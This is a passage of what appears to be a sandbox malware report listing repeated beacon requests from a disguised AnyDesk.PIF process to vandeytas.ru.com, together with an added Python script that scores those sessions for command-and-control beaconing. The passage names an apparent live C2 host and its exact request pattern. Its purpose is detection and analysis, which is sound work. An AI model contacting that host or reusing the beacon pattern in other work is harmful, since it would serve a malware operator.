2024-11-26 08:39:54 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
31          192.168.2.4  49831        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:56 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:56 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:56 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:56 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.4  49838        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:39:58 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:39:59 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:39:58 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:39:59 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
33          192.168.2.4  49845        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:40:00 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:40:01 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:40:01 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:40:01 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
34          192.168.2.4  49852        50.7.187.218    443               7640  C:\Users\Public\Libraries\AnyDesk.PIF
Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:40:02 UTC  165                OUT        GET /233_Hlvzmhuinff HTTP/1.1
                                                       Connection: Keep-Alive
                                                       Accept: */*
                                                       User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                       Host: vandeytas.ru.com
2024-11-26 08:40:03 UTC  164                IN         HTTP/1.1 404 Not Found
                                                       Date: Tue, 26 Nov 2024 08:40:03 GMT
                                                       Server: Apache
                                                       Content-Length: 315
                                                       Connection: close
                                                       Content-Type: text/html; charset=iso-8859-1
2024-11-26 08:40:03 UTC  315                IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                       Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use
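Sessions 22 to 34 above are one and the same request (GET /233_Hlvzmhuinff to vandeytas.ru.com, WinHttp.WinHttpRequest.5 user-agent) issued every two to three seconds by C:\Users\Public\Libraries\AnyDesk.PIF, each answered with a 404. The script below is an added example, not part of the Joe Sandbox report: it re-encodes those session records as constructed sample data and scores them for C2-style beaconing. The grouping key (process, Host, path), the thresholds (at least 5 requests, coefficient of variation of the gap at most 0.25) and the indicator labels are assumptions chosen for illustration, not sandbox output.

```python
"""Beacon scoring over HTTP session records like the ones in the report above.

Added example; sample data is constructed from sessions 22-35 of the table
(timestamps, source ports and status codes), thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Request head exactly as it appears in each session above (constructed copy).
REQUEST_HEAD = (
    "GET /233_Hlvzmhuinff HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Host: vandeytas.ru.com\r\n\r\n"
)

PROCESS = r"C:\Users\Public\Libraries\AnyDesk.PIF"

# (request timestamp, source port, response status) for sessions 22-35.
SESSIONS = [
    ("2024-11-26 08:39:36", 49781, 404), ("2024-11-26 08:39:39", 49783, 404),
    ("2024-11-26 08:39:41", 49785, 404), ("2024-11-26 08:39:43", 49789, 404),
    ("2024-11-26 08:39:45", 49796, 404), ("2024-11-26 08:39:47", 49803, 404),
    ("2024-11-26 08:39:50", 49810, 404), ("2024-11-26 08:39:52", 49817, 404),
    ("2024-11-26 08:39:54", 49824, 404), ("2024-11-26 08:39:56", 49831, 404),
    ("2024-11-26 08:39:58", 49838, 404), ("2024-11-26 08:40:00", 49845, 404),
    ("2024-11-26 08:40:02", 49852, 404), ("2024-11-26 08:40:05", 49859, 404),
]


def parse_request_head(raw):
    """Split an HTTP/1.1 request head into method, path, version and lower-cased headers."""
    lines = raw.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:          # blank line ends the head
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def interval_stats(timestamps):
    """Mean gap between consecutive requests and its coefficient of variation (jitter)."""
    ts = sorted(datetime.strptime(t, "%Y-%m-%d %H:%M:%S") for t in timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    m = mean(gaps)
    cv = pstdev(gaps) / m if m else float("inf")
    return m, cv


def score_group(process, request, sessions, min_requests=5, max_cv=0.25):
    """Return the beacon indicators (assumed labels) that fire for one (process, host, path) group."""
    findings = []
    if len(sessions) < min_requests:
        return findings
    mean_gap, cv = interval_stats(t for t, _, _ in sessions)
    if cv <= max_cv:
        findings.append(f"fixed-interval polling: {len(sessions)} requests, "
                        f"mean gap {mean_gap:.1f}s, cv {cv:.2f}")
    ua = request["headers"].get("user-agent", "")
    if "WinHttp.WinHttpRequest" in ua:
        findings.append("WinHTTP COM user-agent (script or loader, not a browser)")
    low = process.lower()
    if low.startswith(r"c:\users\public"):
        findings.append("client runs from C:\\Users\\Public")
    if low.endswith((".pif", ".com", ".scr")):
        findings.append("client has a non-standard executable extension")
    if {s for _, _, s in sessions} == {404}:
        findings.append("every request answered 404 (nothing served at the C2 path during analysis)")
    return findings


def analyse(records):
    """Group (process, raw_head, timestamp, port, status) rows by process/host/path and score each group."""
    groups = defaultdict(list)
    heads = {}
    for process, raw, ts, port, status in records:
        req = parse_request_head(raw)
        key = (process, req["headers"].get("host", ""), req["path"])
        groups[key].append((ts, port, status))
        heads[key] = req
    return {key: score_group(key[0], heads[key], sess) for key, sess in groups.items()}


if __name__ == "__main__":
    rows = [(PROCESS, REQUEST_HEAD, ts, port, st) for ts, port, st in SESSIONS]
    for (proc, host, path), findings in analyse(rows).items():
        print(f"{proc} -> {host}{path}")
        for finding in findings:
            print("  -", finding)
```

On the records above the group yields all five indicators: 14 requests with a mean gap of about 2.2 s and a coefficient of variation around 0.19, the WinHTTP COM user-agent, a client in C:\Users\Public with a .PIF extension, and a uniform 404. A 404 from the configured C2 path is not evidence of a benign sample; it only says the operator was not serving a payload at that path at analysis time.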


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    35 | 192.168.2.4 | 49859 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:05 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:05 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:05 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:05 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    36 | 192.168.2.4 | 49866 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:07 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:07 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:07 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:07 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    37 | 192.168.2.4 | 49870 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:09 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:09 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:09 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:09 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    38 | 192.168.2.4 | 49876 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:11 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:12 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:11 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:12 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    39 | 192.168.2.4 | 49881 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:13 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:14 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:14 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:14 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    40 | 192.168.2.4 | 49887 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:15 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:16 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:16 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:16 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    41 | 192.168.2.4 | 49894 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:18 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:18 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:18 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:18 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    42 | 192.168.2.4 | 49900 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:20 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:20 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:20 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:20 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    43 | 192.168.2.4 | 49907 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:22 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:22 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:22 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:22 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    44 | 192.168.2.4 | 49914 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:24 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:25 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:25 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:25 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    45 | 192.168.2.4 | 49921 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:26 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:27 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:27 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:27 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    46 | 192.168.2.4 | 49928 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:29 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:29 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:29 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:29 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    47 | 192.168.2.4 | 49935 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:31 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                    2024-11-26 08:40:31 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:31 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    2024-11-26 08:40:31 UTC | 315 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    48 | 192.168.2.4 | 49942 | 50.7.187.218 | 443 | 7640 | C:\Users\Public\Libraries\AnyDesk.PIF
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-26 08:40:33 UTC | 165 | OUT | GET /233_Hlvzmhuinff HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: vandeytas.ru.com
                                                     2024-11-26 08:40:33 UTC | 164 | IN | HTTP/1.1 404 Not Found
                                                    Date: Tue, 26 Nov 2024 08:40:33 GMT
                                                    Server: Apache
                                                    Content-Length: 315
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
